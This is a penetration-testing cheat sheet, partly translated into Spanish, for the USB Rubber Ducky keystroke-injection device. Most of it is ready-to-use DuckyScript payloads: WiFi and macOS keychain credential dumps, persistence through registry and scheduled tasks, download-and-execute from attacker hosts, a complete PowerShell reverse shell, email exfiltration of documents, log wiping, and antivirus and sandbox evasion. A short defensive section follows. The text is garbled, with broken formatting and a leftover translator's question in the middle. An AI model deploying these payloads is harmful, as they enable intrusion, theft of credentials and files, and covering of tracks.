Hoja de Referencia de Herramienta de Inyección de Pulsaciones USB Rubber Ducky¶
Descripción General¶
El USB Rubber Ducky es una herramienta de inyección de pulsaciones disfrazada de unidad flash genérica. Creado por Hak5, aparece como un teclado para la computadora objetivo y puede ejecutar secuencias de pulsaciones preprogramadas a velocidades sobrehumanas. Se utiliza comúnmente para pruebas de penetración, evaluaciones de ingeniería social y demostraciones de seguridad.
⚠️ Advertencia: Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y evaluaciones de seguridad. Asegúrese de tener la autorización adecuada antes de usarla en cualquier entorno.
Descripción General del Hardware¶
Especificaciones del USB Rubber Ducky¶
- Procesador: Procesador de 32 bits a 60 MHz
- Almacenamiento: Tarjeta MicroSD (hasta 32GB)
- Interfaz: USB 2.0
- Velocidad: Tasa de inyección de 1000 palabras por minuto
- Compatibilidad: Windows, Mac, Linux, Android
- Energía: Alimentado por bus a través de USB
Componentes Requeridos¶
- Dispositivo USB Rubber Ducky
- Tarjeta MicroSD (formateada como FAT o FAT32)
- Computadora con acceso a internet para desarrollo de payload
- Computadora objetivo con puerto USB
Would you like me to continue translating the rest of the document? If so, I can proceed section by section.```bash
Format MicroSD card¶
Windows: Use Disk Management or format command¶
format F: /FS:FAT32 /Q
Linux: Use fdisk and mkfs¶
sudo fdisk /dev/sdX sudo mkfs.fat -F32 /dev/sdX1
macOS: Use Disk Utility or diskutil¶
diskutil eraseDisk FAT32 DUCKY /dev/diskX
### Firmware Updates
```bash
# Download latest firmware from Hak5
# Flash firmware using DFU mode
# Hold button while plugging in to enter DFU mode
# Linux firmware flashing
sudo dfu-util -D firmware.bin
# Windows firmware flashing (use Hak5 Flash tool)
# Follow Hak5 documentation for firmware updates
File Structure¶
MicroSD Card Structure:
├── inject.bin (compiled payload)
├── config.txt (optional configuration)
└── payloads/ (source payload files)
DuckyScript Language¶
Basic Syntax¶
Core Commands¶
| Comando | Descripción | Ejemplo |
|---|---|---|
REM |
Línea de comentario | REM This is a comment |
DELAY |
Pausar ejecución (ms) | DELAY 1000 |
STRING |
Escribir cadena de texto | STRING Hello World |
ENTER |
Presione la tecla Enter | ENTER |
TAB |
Presione la tecla Tab | TAB |
ESCAPE |
Presionar tecla Escape | ESCAPE |
SPACE |
Presiona la tecla Espacio | SPACE |
REPEAT |
Repetir último comando | REPEAT 5 |
| ### Modifier Keys | ||
| Comando | Descripción | |
| --------- | ------------- | |
CTRL or CONTROL |
Tecla Control | |
ALT |
Tecla Alt | |
SHIFT |
Tecla Shift | |
GUI or WINDOWS |
Tecla Windows/Cmd | |
MENU or APP |
Tecla Menú/Aplicación | |
| ### Key Combinations | ||
Payload Development¶
Basic Payload Structure¶
REM Author: Security Tester
REM Description: Basic Windows enumeration
REM Target: Windows 10/11
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING whoami && hostname && ipconfig
ENTER
DELAY 2000
STRING exit
ENTER
Windows Payloads¶
System Information Gathering¶
REM Windows System Information
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-ComputerInfo|Out-File C:\temp\sysinfo.txt
ENTER
DELAY 2000
STRING Get-Process|Out-File C:\temp\processes.txt -Append
ENTER
DELAY 2000
STRING Get-Service|Out-File C:\temp\services.txt -Append
ENTER
DELAY 2000
STRING exit
ENTER
Network Reconnaissance¶
REM Network Information Gathering
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING ipconfig /all > C:\temp\network.txt
ENTER
DELAY 1000
STRING netstat -an >> C:\temp\network.txt
ENTER
DELAY 1000
STRING arp -a >> C:\temp\network.txt
ENTER
DELAY 1000
STRING route print >> C:\temp\network.txt
ENTER
DELAY 1000
STRING exit
ENTER
Credential Harvesting¶
REM WiFi Password Extraction
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING netsh wlan show profiles
ENTER
DELAY 2000
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j|findstr -i -v echo|netsh wlan show profiles %j key=clear
ENTER
DELAY 5000
STRING exit
ENTER
Persistence Mechanisms¶
REM Registry Persistence
DELAY 2000
GUI r
DELAY 500
STRING regedit
ENTER
DELAY 2000
CTRL f
DELAY 500
STRING HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ENTER
DELAY 1000
ALT F4
DELAY 500
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\Windows\System32\calc.exe"
ENTER
DELAY 1000
STRING exit
ENTER
macOS Payloads¶
System Information¶
REM macOS System Information
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING system_profiler SPHardwareDataType > ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING ps aux >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING netstat -an >> ~/Desktop/sysinfo.txt
ENTER
DELAY 2000
STRING exit
ENTER
Keychain Access¶
REM macOS Keychain Dump
DELAY 2000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 1000
STRING security dump-keychain -d login.keychain > ~/Desktop/keychain.txt 2>&1
ENTER
DELAY 5000
STRING exit
ENTER
Linux Payloads¶
System Enumeration¶
REM Linux System Enumeration
DELAY 2000
CTRL ALT t
DELAY 1000
STRING uname -a > /tmp/sysinfo.txt
ENTER
DELAY 500
STRING cat /etc/passwd >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING ps aux >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING netstat -tulpn >> /tmp/sysinfo.txt
ENTER
DELAY 500
STRING exit
ENTER
Privilege Escalation Check¶
REM Linux Privilege Escalation Check
DELAY 2000
CTRL ALT t
DELAY 1000
STRING sudo -l > /tmp/privesc.txt
ENTER
DELAY 1000
STRING find / -perm -4000 2>/dev/null >> /tmp/privesc.txt
ENTER
DELAY 2000
STRING crontab -l >> /tmp/privesc.txt
ENTER
DELAY 1000
STRING exit
ENTER
Advanced Payloads¶
Multi-Stage Payloads¶
REM Multi-stage payload with download
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/stage2.ps1')
ENTER
DELAY 5000
STRING exit
ENTER
Reverse Shell Payload¶
REM PowerShell Reverse Shell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%\\\\{0\\\\};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)\\\\{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1|Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()\\\\};$client.Close()
ENTER
Data Exfiltration¶
REM Data Exfiltration via Email
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $files = Get-ChildItem C:\Users\$env:USERNAME\Documents -Recurse -Include *.txt,*.doc,*.pdf|Select-Object -First 10
ENTER
DELAY 1000
STRING foreach($file in $files) \\\\{ $content = Get-Content $file.FullName -Raw; Send-MailMessage -To "attacker@evil.com" -From "victim@company.com" -Subject $file.Name -Body $content -SmtpServer "smtp.company.com" \\\\}
ENTER
DELAY 5000
STRING exit
ENTER
Anti-Forensics¶
REM Clear Event Logs
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Get-EventLog -List|ForEach-Object \\\\{ Clear-EventLog $_.Log \\\\}
ENTER
DELAY 2000
STRING Remove-Item $env:TEMP\* -Recurse -Force
ENTER
DELAY 2000
STRING exit
ENTER
Payload Compilation¶
Using DuckEncoder¶
# Download DuckEncoder
git clone https://github.com/hak5darren/USB-Rubber-Ducky.git
cd USB-Rubber-Ducky
# Compile payload
java -jar Encoder/encoder.jar -i payload.txt -o inject.bin
# Alternative online encoder
# Visit: https://ducktoolkit.com/encoder
Using Duck Toolkit¶
# Online compilation at ducktoolkit.com
# 1. Paste DuckyScript code
# 2. Select keyboard layout
# 3. Click "Encode Payload"
# 4. Download inject.bin file
Keyboard Layouts¶
# Common keyboard layouts
us # US English
uk # UK English
de # German
fr # French
es # Spanish
it # Italian
pt # Portuguese
ru # Russian
Deployment Strategies¶
Physical Access Scenarios¶
REM Quick deployment (30 seconds)
DELAY 2000
GUI r
DELAY 500
STRING cmd /c "powershell IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/payload')"
ENTER
Social Engineering Integration¶
REM Disguised as software update
DELAY 3000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Dear User,
ENTER
STRING
ENTER
STRING A critical security update is being installed.
ENTER
STRING Please do not remove this device until complete.
ENTER
STRING
ENTER
STRING Estimated time: 2-3 minutes
ENTER
DELAY 2000
ALT F4
DELAY 500
REM Execute actual payload here
Persistence Payloads¶
REM Scheduled Task Persistence
DELAY 2000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING schtasks /create /tn "SecurityUpdate" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Windows\Temp\update.ps1" /sc daily /st 09:00
ENTER
DELAY 1000
STRING exit
ENTER
Evasion Techniques¶
Anti-Virus Evasion¶
REM Obfuscated PowerShell
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -EncodedCommand <base64_encoded_command>
ENTER
Timing-Based Evasion¶
REM Random delays to avoid detection
DELAY 3000
GUI r
DELAY 800
STRING cmd
ENTER
DELAY 1200
STRING echo "Normal user activity"
ENTER
DELAY 2500
REM Execute payload with human-like timing
Process Hiding¶
REM Hide PowerShell window
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -NoProfile -NonInteractive
ENTER
DELAY 1000
STRING Start-Process powershell -ArgumentList "-WindowStyle Hidden -Command 'Your-Command-Here'" -WindowStyle Hidden
ENTER
Defensive Measures and Detection¶
USB Device Monitoring¶
# Monitor USB device insertions
Get-WinEvent -FilterHashtable @\\\\{LogName='System'; ID=20001,20003\\\\}|
Where-Object \\\\{$_.Message -like "*USB*"\\\\}
# Registry monitoring for USB devices
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\*"|
Select-Object FriendlyName, Mfg, Service
Keystroke Injection Detection¶
# Monitor for rapid keystroke patterns
# Look for superhuman typing speeds in logs
Get-WinEvent -FilterHashtable @\\\\{LogName='Security'; ID=4648,4624\\\\}|
Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-5)\\\\}
# Monitor for suspicious command patterns
Get-WinEvent -FilterHashtable @\\\\{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104\\\\}|
Where-Object \\\\{$_.Message -like "*DownloadString*" -or $_.Message -like "*IEX*"\\\\}
USB Port Restrictions¶
REM Disable USB storage devices via Group Policy
REM Computer Configuration > Administrative Templates > System > Removable Storage Access
REM Registry method to disable USB storage
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f
Countermeasures¶
Endpoint Protection¶
# Enable PowerShell logging
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1
# Enable command line auditing
auditpol /set /subcategory:"Process Creation" /success:enable
# Monitor for suspicious processes
Get-Process|Where-Object \\\\{$_.ProcessName -like "*powershell*" -and $_.MainWindowTitle -eq ""\\\\}
Network Monitoring¶
# Monitor for suspicious network connections
netstat -an|grep ESTABLISHED|grep -E "(4444|8080|443)"
# DNS monitoring for suspicious domains
# Monitor DNS logs for newly registered domains or suspicious TLDs
User Education¶
Key indicators of USB Rubber Ducky attacks:
1. Unexpected keyboard activity
2. Rapid text entry beyond human capability
3. Command prompts appearing automatically
4. Suspicious network activity after USB insertion
5. New scheduled tasks or startup programs
Advanced Techniques¶
Payload Chaining¶
REM Stage 1: Initial access
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING Invoke-WebRequest -Uri "http://attacker.com/stage2.txt" -OutFile "$env:TEMP\s2.txt"
ENTER
DELAY 3000
STRING Get-Content "$env:TEMP\s2.txt"|Invoke-Expression
ENTER
DELAY 1000
STRING exit
ENTER
Environment Detection¶
REM Detect virtualized environment
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ((Get-WmiObject -Class Win32_ComputerSystem).Model -notlike "*Virtual*") \\\\{ Your-Payload-Here \\\\}
ENTER
DELAY 2000
STRING exit
ENTER
Conditional Execution¶
REM Execute only on specific OS version
DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING if ([Environment]::OSVersion.Version.Major -eq 10) \\\\{ Your-Windows10-Payload \\\\}
ENTER
DELAY 2000
STRING exit
ENTER
Troubleshooting¶
Common Issues¶
``` Issue: Payload not executing Solution: Check keyboard layout, verify inject.bin file
Issue: Commands typing incorrectly Solution: Verify keyboard layout matches target system
Issue: Timing issues Solution: Increase DELAY values for slower systems
Issue: Antivirus detection
Solution: Use obfuscation techniques, test on similar AV
### Depuración de Payloadsbash
REM Debug payload with visible output
DELAY 2000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 1000
STRING Payload executed successfully
ENTER
STRING Current user:
STRING %USERNAME%
ENTER
STRING Current time:
STRING %TIME%
ENTER
### Entorno de Pruebasbash
Set up isolated testing environment¶
Use virtual machines for payload development¶
Test on multiple OS versions and configurations¶
Verify payload behavior before deployment¶
```## Consideraciones Legales y Éticas
Uso Autorizado Únicamente¶
- Obtener permiso por escrito antes de realizar pruebas
- Usar solo en entornos controlados
- Documentar todas las actividades de prueba
- Seguir prácticas de divulgación responsable
Requisitos de Cumplimiento¶
- Asegurar el cumplimiento de leyes locales
- Seguir las políticas de seguridad organizacionales
- Mantener la cadena de custodia de la evidencia
- Proteger información sensible descubierta
Recursos¶
- Hak5 USB Rubber Ducky
- Documentación de DuckyScript
- Duck Toolkit
- Repositorio de Payloads
- Foros de Hak5
Esta hoja de referencia proporciona una referencia completa para el uso del USB Rubber Ducky. Siempre asegúrese de tener la autorización adecuada antes de realizar evaluaciones de seguridad física.